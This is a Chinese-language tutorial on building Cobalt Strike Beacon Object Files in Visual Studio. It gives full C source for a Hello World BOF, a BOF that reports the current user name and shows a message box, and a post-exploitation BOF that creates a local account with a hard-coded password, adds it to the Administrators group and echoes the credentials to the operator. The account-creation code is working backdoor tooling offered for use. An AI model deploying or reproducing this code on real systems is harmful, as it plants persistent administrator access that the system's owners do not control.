模版导入
BOF模版文件
https://github.com/securifybv/Visual-Studio-BOF-template
把模版文件放入
C:\Users\<用户名>\Documents\Visual Studio 2022\Templates\ProjectTemplates\
目录下
新建项目时选中 BOF 模版后直接编译即可。代码中通过 BOF 宏区分两种构建：定义 BOF 时编译 `#ifdef BOF` 内的 go() 入口（生成 Beacon 加载的对象文件），未定义时编译 `#ifndef BOF` 内的 main()，用于本地调试。
代码文件
测试输出（Hello World；弹窗示例见下文「用户名」一节中的 MessageBoxA 调用）
#include <stdio.h>
#include "bofdefs.h"
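extern "C" {
/*
 * BOF entry point. Beacon calls go() with the packed argument buffer;
 * this demo takes no arguments, so buff/len are unused.
 *
 * With BOF defined the text is sent back to the operator through
 * BeaconPrintf; without it this is the local debug build driven by main()
 * below and the same text goes to stdout. The function definition and both
 * closing braces sit outside the #ifdef so that the non-BOF build still
 * gets a balanced extern "C" block and a declared go() for main() to call
 * (previously the stray '}' and the missing go() broke that build).
 */
void go(char* buff, int len) {
    (void)buff;
    (void)len;
#ifdef BOF
    BeaconPrintf(CALLBACK_OUTPUT, "Hello, World!");
#else
    printf("Hello, World!\n");
#endif
}
}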
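#ifndef BOF
/*
 * Local debug harness (non-BOF build only): runs the BOF logic as a normal
 * executable so it can be stepped through in the debugger. argc/argv are
 * accepted for the standard signature but not used. Returns 0.
 * (main must return int; `void main` is non-standard.)
 */
int main(int argc, char* argv[]) {
    (void)argc;
    (void)argv;
    go(NULL, 0);
    return 0;
}
#endif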
用户名
#include <windows.h>
#include <stdio.h>
#include "bofdefs.h"
#pragma region error_handling
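#define print_error(msg, hr) _print_error(__FUNCTION__, __LINE__, msg, hr)
/*
 * Report a failure as "(function at line): msg 0xHRESULT".
 *
 * In the BOF build the message goes to the operator on the CALLBACK_ERROR
 * channel; in the local debug build it goes to stdout, one line per call.
 * func and msg are const: callers pass __FUNCTION__ and string literals,
 * which must not be passed through a non-const char*. The hr is cast to
 * unsigned long to match the %lx conversion. Always returns FALSE so a
 * caller can write `return print_error("...", hr);` on its failure path.
 */
BOOL _print_error(const char* func, int line, const char* msg, HRESULT hr) {
#ifdef BOF
    BeaconPrintf(CALLBACK_ERROR, "(%s at %d): %s 0x%08lx", func, line, msg, (unsigned long)hr);
#else
    printf("[-] (%s at %d): %s 0x%08lx\n", func, line, msg, (unsigned long)hr);
#endif // BOF
    return FALSE;
}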
#pragma endregion
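/*
 * Dynamic Function Resolution imports. A BOF carries no import table, so
 * each Win32 API is declared as MODULE$Function and the Beacon loader
 * resolves it at run time. The prototypes mirror the Windows SDK ones:
 * GetUserNameA returns BOOL (and on failure leaves the buffer unusable),
 * MessageBoxA returns int (the button pressed).
 */
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$GetUserNameA(LPSTR, LPDWORD);
DECLSPEC_IMPORT int WINAPI User32$MessageBoxA(HWND, LPCSTR, LPCSTR, UINT);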
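#ifdef BOF
/*
 * BOF entry point: report the user name of the process hosting the Beacon,
 * then pop a message box (the "popup" test). buff/len are the packed BOF
 * arguments; none are expected, so they are unused.
 *
 * NOTE(review): MessageBoxA blocks until someone at the target's console
 * dismisses it, so the Beacon hangs until then, and the box is visible on
 * screen. Keep this for lab testing only.
 */
void go(char* buff, int len) {
    (void)buff;
    (void)len;

    /* Deliberately not `= {0}`: a large zero-initialised array can be
     * lowered to a memset() call that a BOF has no import for. The buffer is
     * only read after GetUserNameA reports success, which is when it holds a
     * NUL-terminated name. */
    char username[1024];
    DWORD usernameLength = sizeof username;   /* in: capacity; out: length incl. NUL */

    if (!ADVAPI32$GetUserNameA(username, &usernameLength)) {
        /* On failure the buffer contents are undefined: never print them. */
        BeaconPrintf(CALLBACK_ERROR, "GetUserNameA failed");
        return;
    }
    BeaconPrintf(CALLBACK_OUTPUT, "当前用户名为:%s", username);

    User32$MessageBoxA(0, 0, 0, 0);
}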
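#else
/*
 * Local debug harness (non-BOF build). Intentionally empty: this listing's
 * go() only exists in the BOF build. argc/argv are unused. Returns 0
 * (main must return int; `void main` is non-standard).
 */
int main(int argc, char* argv[]) {
    (void)argc;
    (void)argv;
    return 0;
}
#endif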
添加用户
#include <windows.h>
#include <lm.h>
#include <stdio.h>
#include "bofdefs.h"
#pragma region error_handling
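#define print_error(msg, hr) _print_error(__FUNCTION__, __LINE__, msg, hr)
/*
 * Report a failure as "(function at line): msg 0xHRESULT".
 *
 * In the BOF build the message goes to the operator on the CALLBACK_ERROR
 * channel; in the local debug build it goes to stdout, one line per call.
 * func and msg are const: callers pass __FUNCTION__ and string literals,
 * which must not be passed through a non-const char*. The hr is cast to
 * unsigned long to match the %lx conversion. Always returns FALSE so a
 * caller can write `return print_error("...", hr);` on its failure path.
 */
BOOL _print_error(const char* func, int line, const char* msg, HRESULT hr) {
#ifdef BOF
    BeaconPrintf(CALLBACK_ERROR, "(%s at %d): %s 0x%08lx", func, line, msg, (unsigned long)hr);
#else
    printf("[-] (%s at %d): %s 0x%08lx\n", func, line, msg, (unsigned long)hr);
#endif // BOF
    return FALSE;
}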
#pragma endregion
/* Dynamic Function Resolution imports (MODULE$Function), resolved by the
 * Beacon loader at run time since a BOF has no import table. NetUserAdd's
 * last parameter receives the index of the first invalid USER_INFO_* member
 * when the call fails with ERROR_INVALID_PARAMETER; NetLocalGroupAddMembers
 * takes the member array level (3 = LOCALGROUP_MEMBERS_INFO_3, by name) and
 * the entry count. */
DECLSPEC_IMPORT NET_API_STATUS WINAPI NETAPI32$NetUserAdd(LPWSTR, DWORD, PBYTE, PDWORD);
DECLSPEC_IMPORT NET_API_STATUS WINAPI NETAPI32$NetLocalGroupAddMembers(LPCWSTR, LPCWSTR, DWORD, PBYTE, DWORD);
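#ifdef BOF
/*
 * BOF entry point: create a local user with a fixed name/password and add
 * it to the local Administrators group. Requires an elevated Beacon
 * (BeaconIsAdmin), since both NetAPI calls need administrative rights on
 * the local machine. buff/len (packed BOF arguments) are unused: the
 * credentials are compile-time constants, so anyone who obtains the object
 * file learns them, and they are echoed to the operator console on success.
 *
 * Each step reports its NET_API_STATUS on failure so the operator can tell
 * e.g. an existing account (NERR_UserExists) or a password-policy rejection
 * from an access problem. If the group step fails the user has still been
 * created, and the message says which step failed.
 */
void go(char* buff, int len) {
    (void)buff;
    (void)len;

    if (!BeaconIsAdmin()) {
        BeaconPrintf(CALLBACK_OUTPUT, "非管理权限");
        return;
    }

    LPCWSTR username = L"sanfortest";
    LPCWSTR password = L"san!@#123";

    /* Every USER_INFO_1 member is assigned explicitly instead of calling
     * ZeroMemory(): that macro expands to memset(), which a BOF can only
     * call if bofdefs.h maps it to a resolved import (e.g. MSVCRT$memset). */
    USER_INFO_1 ui;
    ui.usri1_name = (LPWSTR)username;       /* the NetAPI structure takes non-const pointers */
    ui.usri1_password = (LPWSTR)password;
    ui.usri1_password_age = 0;              /* ignored by NetUserAdd */
    ui.usri1_priv = USER_PRIV_USER;         /* the only value NetUserAdd accepts */
    ui.usri1_home_dir = NULL;
    ui.usri1_comment = NULL;
    ui.usri1_flags = UF_SCRIPT | UF_DONT_EXPIRE_PASSWD;  /* UF_SCRIPT is mandatory */
    ui.usri1_script_path = NULL;

    const DWORD level = 1;                  /* buffer is a USER_INFO_1 */
    DWORD parmErr = 0;                      /* index of the offending member on ERROR_INVALID_PARAMETER */
    NET_API_STATUS addStatus = NETAPI32$NetUserAdd(NULL, level, (LPBYTE)&ui, &parmErr);
    if (addStatus != NERR_Success) {
        /* NET_API_STATUS is a DWORD: print it unsigned, with parm_err for diagnosis. */
        BeaconPrintf(CALLBACK_ERROR, "User added error %lu (parm_err %lu)",
                     (unsigned long)addStatus, (unsigned long)parmErr);
        return;
    }

    LOCALGROUP_MEMBERS_INFO_3 member;
    member.lgrmi3_domainandname = (LPWSTR)username;
    /* Level 3 = members identified by name; exactly one entry. */
    NET_API_STATUS groupStatus = NETAPI32$NetLocalGroupAddMembers(NULL, L"Administrators", 3, (LPBYTE)&member, 1);
    /* Test the status of the group call itself, not the earlier NetUserAdd
     * status; otherwise a failed group add is reported as success. */
    if (groupStatus != NERR_Success) {
        BeaconPrintf(CALLBACK_ERROR, "用户 %ls 管理员组添加失败 (status %lu)",
                     username, (unsigned long)groupStatus);
        return;
    }

    BeaconPrintf(CALLBACK_OUTPUT, " %ls 用户、管理员组添加成功\n", username);
    BeaconPrintf(CALLBACK_OUTPUT, "用户名: %ls,密码:%ls\n", username, password);
}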
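#else
/*
 * Local debug harness (non-BOF build). Intentionally empty: this listing's
 * go() only exists in the BOF build. argc/argv are unused. Returns 0
 * (main must return int; `void main` is non-standard).
 */
int main(int argc, char* argv[]) {
    (void)argc;
    (void)argv;
    return 0;
}
#endif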
参考链接
https://cn-sec.com/archives/2250195.html